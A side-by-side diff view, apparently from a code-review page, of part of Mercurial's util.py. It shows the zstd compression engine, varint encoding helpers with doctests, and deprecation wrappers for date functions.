3793 self._cctx = zstd.ZstdCompressor(level=level,
3802 self._cctx = zstd.ZstdCompressor(level=level,
3794 write_content_size=True)
3803 write_content_size=True)
3795 self._dctx = zstd.ZstdDecompressor()
3804 self._dctx = zstd.ZstdDecompressor()
3796 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3805 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3797 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3806 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3798
3807
3799 def compress(self, data):
3808 def compress(self, data):
3800 insize = len(data)
3809 insize = len(data)
3801 # Caller handles empty input case.
3810 # Caller handles empty input case.
3802 assert insize > 0
3811 assert insize > 0
3803
3812
3804 if insize < 50:
3813 if insize < 50:
3805 return None
3814 return None
3806
3815
3807 elif insize <= 1000000:
3816 elif insize <= 1000000:
3808 compressed = self._cctx.compress(data)
3817 compressed = self._cctx.compress(data)
3809 if len(compressed) < insize:
3818 if len(compressed) < insize:
3810 return compressed
3819 return compressed
3811 return None
3820 return None
3812 else:
3821 else:
3813 z = self._cctx.compressobj()
3822 z = self._cctx.compressobj()
3814 chunks = []
3823 chunks = []
3815 pos = 0
3824 pos = 0
3816 while pos < insize:
3825 while pos < insize:
3817 pos2 = pos + self._compinsize
3826 pos2 = pos + self._compinsize
3818 chunk = z.compress(data[pos:pos2])
3827 chunk = z.compress(data[pos:pos2])
3819 if chunk:
3828 if chunk:
3820 chunks.append(chunk)
3829 chunks.append(chunk)
3821 pos = pos2
3830 pos = pos2
3822 chunks.append(z.flush())
3831 chunks.append(z.flush())
3823
3832
3824 if sum(map(len, chunks)) < insize:
3833 if sum(map(len, chunks)) < insize:
3825 return ''.join(chunks)
3834 return ''.join(chunks)
3826 return None
3835 return None
3827
3836
3828 def decompress(self, data):
3837 def decompress(self, data):
3829 insize = len(data)
3838 insize = len(data)
3830
3839
3831 try:
3840 try:
3832 # This was measured to be faster than other streaming
3841 # This was measured to be faster than other streaming
3833 # decompressors.
3842 # decompressors.
3834 dobj = self._dctx.decompressobj()
3843 dobj = self._dctx.decompressobj()
3835 chunks = []
3844 chunks = []
3836 pos = 0
3845 pos = 0
3837 while pos < insize:
3846 while pos < insize:
3838 pos2 = pos + self._decompinsize
3847 pos2 = pos + self._decompinsize
3839 chunk = dobj.decompress(data[pos:pos2])
3848 chunk = dobj.decompress(data[pos:pos2])
3840 if chunk:
3849 if chunk:
3841 chunks.append(chunk)
3850 chunks.append(chunk)
3842 pos = pos2
3851 pos = pos2
3843 # Frame should be exhausted, so no finish() API.
3852 # Frame should be exhausted, so no finish() API.
3844
3853
3845 return ''.join(chunks)
3854 return ''.join(chunks)
3846 except Exception as e:
3855 except Exception as e:
3847 raise error.RevlogError(_('revlog decompress error: %s') %
3856 raise error.RevlogError(_('revlog decompress error: %s') %
3848 forcebytestr(e))
3857 forcebytestr(e))
3849
3858
3850 def revlogcompressor(self, opts=None):
3859 def revlogcompressor(self, opts=None):
3851 opts = opts or {}
3860 opts = opts or {}
3852 return self.zstdrevlogcompressor(self._module,
3861 return self.zstdrevlogcompressor(self._module,
3853 level=opts.get('level', 3))
3862 level=opts.get('level', 3))
3854
3863
3855 compengines.register(_zstdengine())
3864 compengines.register(_zstdengine())
3856
3865
3857 def bundlecompressiontopics():
3866 def bundlecompressiontopics():
3858 """Obtains a list of available bundle compressions for use in help."""
3867 """Obtains a list of available bundle compressions for use in help."""
3859 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3868 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3860 items = {}
3869 items = {}
3861
3870
3862 # We need to format the docstring. So use a dummy object/type to hold it
3871 # We need to format the docstring. So use a dummy object/type to hold it
3863 # rather than mutating the original.
3872 # rather than mutating the original.
3864 class docobject(object):
3873 class docobject(object):
3865 pass
3874 pass
3866
3875
3867 for name in compengines:
3876 for name in compengines:
3868 engine = compengines[name]
3877 engine = compengines[name]
3869
3878
3870 if not engine.available():
3879 if not engine.available():
3871 continue
3880 continue
3872
3881
3873 bt = engine.bundletype()
3882 bt = engine.bundletype()
3874 if not bt or not bt[0]:
3883 if not bt or not bt[0]:
3875 continue
3884 continue
3876
3885
3877 doc = pycompat.sysstr('``%s``\n %s') % (
3886 doc = pycompat.sysstr('``%s``\n %s') % (
3878 bt[0], engine.bundletype.__doc__)
3887 bt[0], engine.bundletype.__doc__)
3879
3888
3880 value = docobject()
3889 value = docobject()
3881 value.__doc__ = doc
3890 value.__doc__ = doc
3882 value._origdoc = engine.bundletype.__doc__
3891 value._origdoc = engine.bundletype.__doc__
3883 value._origfunc = engine.bundletype
3892 value._origfunc = engine.bundletype
3884
3893
3885 items[bt[0]] = value
3894 items[bt[0]] = value
3886
3895
3887 return items
3896 return items
3888
3897
3889 i18nfunctions = bundlecompressiontopics().values()
3898 i18nfunctions = bundlecompressiontopics().values()
3890
3899
3891 # convenient shortcut
3900 # convenient shortcut
3892 dst = debugstacktrace
3901 dst = debugstacktrace
3893
3902
3894 def safename(f, tag, ctx, others=None):
3903 def safename(f, tag, ctx, others=None):
3895 """
3904 """
3896 Generate a name that it is safe to rename f to in the given context.
3905 Generate a name that it is safe to rename f to in the given context.
3897
3906
3898 f: filename to rename
3907 f: filename to rename
3899 tag: a string tag that will be included in the new name
3908 tag: a string tag that will be included in the new name
3900 ctx: a context, in which the new name must not exist
3909 ctx: a context, in which the new name must not exist
3901 others: a set of other filenames that the new name must not be in
3910 others: a set of other filenames that the new name must not be in
3902
3911
3903 Returns a file name of the form oldname~tag[~number] which does not exist
3912 Returns a file name of the form oldname~tag[~number] which does not exist
3904 in the provided context and is not in the set of other names.
3913 in the provided context and is not in the set of other names.
3905 """
3914 """
3906 if others is None:
3915 if others is None:
3907 others = set()
3916 others = set()
3908
3917
3909 fn = '%s~%s' % (f, tag)
3918 fn = '%s~%s' % (f, tag)
3910 if fn not in ctx and fn not in others:
3919 if fn not in ctx and fn not in others:
3911 return fn
3920 return fn
3912 for n in itertools.count(1):
3921 for n in itertools.count(1):
3913 fn = '%s~%s~%s' % (f, tag, n)
3922 fn = '%s~%s~%s' % (f, tag, n)
3914 if fn not in ctx and fn not in others:
3923 if fn not in ctx and fn not in others:
3915 return fn
3924 return fn
3916
3925
3917 def readexactly(stream, n):
3926 def readexactly(stream, n):
3918 '''read n bytes from stream.read and abort if less was available'''
3927 '''read n bytes from stream.read and abort if less was available'''
3919 s = stream.read(n)
3928 s = stream.read(n)
3920 if len(s) < n:
3929 if len(s) < n:
3921 raise error.Abort(_("stream ended unexpectedly"
3930 raise error.Abort(_("stream ended unexpectedly"
3922 " (got %d bytes, expected %d)")
3931 " (got %d bytes, expected %d)")
3923 % (len(s), n))
3932 % (len(s), n))
3924 return s
3933 return s
3925
3934
3926 def uvarintencode(value):
3935 def uvarintencode(value):
3927 """Encode an unsigned integer value to a varint.
3936 """Encode an unsigned integer value to a varint.
3928
3937
3929 A varint is a variable length integer of 1 or more bytes. Each byte
3938 A varint is a variable length integer of 1 or more bytes. Each byte
3930 except the last has the most significant bit set. The lower 7 bits of
3939 except the last has the most significant bit set. The lower 7 bits of
3931 each byte store the 2's complement representation, least significant group
3940 each byte store the 2's complement representation, least significant group
3932 first.
3941 first.
3933
3942
3934 >>> uvarintencode(0)
3943 >>> uvarintencode(0)
3935 '\\x00'
3944 '\\x00'
3936 >>> uvarintencode(1)
3945 >>> uvarintencode(1)
3937 '\\x01'
3946 '\\x01'
3938 >>> uvarintencode(127)
3947 >>> uvarintencode(127)
3939 '\\x7f'
3948 '\\x7f'
3940 >>> uvarintencode(1337)
3949 >>> uvarintencode(1337)
3941 '\\xb9\\n'
3950 '\\xb9\\n'
3942 >>> uvarintencode(65536)
3951 >>> uvarintencode(65536)
3943 '\\x80\\x80\\x04'
3952 '\\x80\\x80\\x04'
3944 >>> uvarintencode(-1)
3953 >>> uvarintencode(-1)
3945 Traceback (most recent call last):
3954 Traceback (most recent call last):
3946 ...
3955 ...
3947 ProgrammingError: negative value for uvarint: -1
3956 ProgrammingError: negative value for uvarint: -1
3948 """
3957 """
3949 if value < 0:
3958 if value < 0:
3950 raise error.ProgrammingError('negative value for uvarint: %d'
3959 raise error.ProgrammingError('negative value for uvarint: %d'
3951 % value)
3960 % value)
3952 bits = value & 0x7f
3961 bits = value & 0x7f
3953 value >>= 7
3962 value >>= 7
3954 bytes = []
3963 bytes = []
3955 while value:
3964 while value:
3956 bytes.append(pycompat.bytechr(0x80 | bits))
3965 bytes.append(pycompat.bytechr(0x80 | bits))
3957 bits = value & 0x7f
3966 bits = value & 0x7f
3958 value >>= 7
3967 value >>= 7
3959 bytes.append(pycompat.bytechr(bits))
3968 bytes.append(pycompat.bytechr(bits))
3960
3969
3961 return ''.join(bytes)
3970 return ''.join(bytes)
3962
3971
3963 def uvarintdecodestream(fh):
3972 def uvarintdecodestream(fh):
3964 """Decode an unsigned variable length integer from a stream.
3973 """Decode an unsigned variable length integer from a stream.
3965
3974
3966 The passed argument is anything that has a ``.read(N)`` method.
3975 The passed argument is anything that has a ``.read(N)`` method.
3967
3976
3968 >>> try:
3977 >>> try:
3969 ... from StringIO import StringIO as BytesIO
3978 ... from StringIO import StringIO as BytesIO
3970 ... except ImportError:
3979 ... except ImportError:
3971 ... from io import BytesIO
3980 ... from io import BytesIO
3972 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3981 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3973 0
3982 0
3974 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3983 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3975 1
3984 1
3976 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3985 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3977 127
3986 127
3978 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3987 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3979 1337
3988 1337
3980 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3989 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3981 65536
3990 65536
3982 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3991 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3983 Traceback (most recent call last):
3992 Traceback (most recent call last):
3984 ...
3993 ...
3985 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3994 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3986 """
3995 """
3987 result = 0
3996 result = 0
3988 shift = 0
3997 shift = 0
3989 while True:
3998 while True:
3990 byte = ord(readexactly(fh, 1))
3999 byte = ord(readexactly(fh, 1))
3991 result |= ((byte & 0x7f) << shift)
4000 result |= ((byte & 0x7f) << shift)
3992 if not (byte & 0x80):
4001 if not (byte & 0x80):
3993 return result
4002 return result
3994 shift += 7
4003 shift += 7
3995
4004
3996 ###
4005 ###
3997 # Deprecation warnings for util.py splitting
4006 # Deprecation warnings for util.py splitting
3998 ###
4007 ###
3999
4008
4000 defaultdateformats = dateutil.defaultdateformats
4009 defaultdateformats = dateutil.defaultdateformats
4001
4010
4002 extendeddateformats = dateutil.extendeddateformats
4011 extendeddateformats = dateutil.extendeddateformats
4003
4012
4004 def makedate(*args, **kwargs):
4013 def makedate(*args, **kwargs):
4005 msg = ("'util.makedate' is deprecated, "
4014 msg = ("'util.makedate' is deprecated, "
4006 "use 'utils.dateutil.makedate'")
4015 "use 'utils.dateutil.makedate'")
4007 nouideprecwarn(msg, "4.6")
4016 nouideprecwarn(msg, "4.6")
4008 return dateutil.makedate(*args, **kwargs)
4017 return dateutil.makedate(*args, **kwargs)
4009
4018
4010 def datestr(*args, **kwargs):
4019 def datestr(*args, **kwargs):
4011 msg = ("'util.datestr' is deprecated, "
4020 msg = ("'util.datestr' is deprecated, "
4012 "use 'utils.dateutil.datestr'")
4021 "use 'utils.dateutil.datestr'")
4013 nouideprecwarn(msg, "4.6")
4022 nouideprecwarn(msg, "4.6")
4014 debugstacktrace()
4023 debugstacktrace()
4015 return dateutil.datestr(*args, **kwargs)
4024 return dateutil.datestr(*args, **kwargs)
4016
4025
4017 def shortdate(*args, **kwargs):
4026 def shortdate(*args, **kwargs):
4018 msg = ("'util.shortdate' is deprecated, "
4027 msg = ("'util.shortdate' is deprecated, "
4019 "use 'utils.dateutil.shortdate'")
4028 "use 'utils.dateutil.shortdate'")
4020 nouideprecwarn(msg, "4.6")
4029 nouideprecwarn(msg, "4.6")
4021 return dateutil.shortdate(*args, **kwargs)
4030 return dateutil.shortdate(*args, **kwargs)
4022
4031
4023 def parsetimezone(*args, **kwargs):
4032 def parsetimezone(*args, **kwargs):
4024 msg = ("'util.parsetimezone' is deprecated, "
4033 msg = ("'util.parsetimezone' is deprecated, "
4025 "use 'utils.dateutil.parsetimezone'")
4034 "use 'utils.dateutil.parsetimezone'")
4026 nouideprecwarn(msg, "4.6")
4035 nouideprecwarn(msg, "4.6")
4027 return dateutil.parsetimezone(*args, **kwargs)
4036 return dateutil.parsetimezone(*args, **kwargs)
4028
4037
4029 def strdate(*args, **kwargs):
4038 def strdate(*args, **kwargs):
4030 msg = ("'util.strdate' is deprecated, "
4039 msg = ("'util.strdate' is deprecated, "
4031 "use 'utils.dateutil.strdate'")
4040 "use 'utils.dateutil.strdate'")
4032 nouideprecwarn(msg, "4.6")
4041 nouideprecwarn(msg, "4.6")
4033 return dateutil.strdate(*args, **kwargs)
4042 return dateutil.strdate(*args, **kwargs)
4034
4043
4035 def parsedate(*args, **kwargs):
4044 def parsedate(*args, **kwargs):
4036 msg = ("'util.parsedate' is deprecated, "
4045 msg = ("'util.parsedate' is deprecated, "
4037 "use 'utils.dateutil.parsedate'")
4046 "use 'utils.dateutil.parsedate'")
4038 nouideprecwarn(msg, "4.6")
4047 nouideprecwarn(msg, "4.6")
4039 return dateutil.parsedate(*args, **kwargs)
4048 return dateutil.parsedate(*args, **kwargs)
4040
4049
4041 def matchdate(*args, **kwargs):
4050 def matchdate(*args, **kwargs):
4042 msg = ("'util.matchdate' is deprecated, "
4051 msg = ("'util.matchdate' is deprecated, "
4043 "use 'utils.dateutil.matchdate'")
4052 "use 'utils.dateutil.matchdate'")
4044 nouideprecwarn(msg, "4.6")
4053 nouideprecwarn(msg, "4.6")
4045 return dateutil.matchdate(*args, **kwargs)
4054 return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now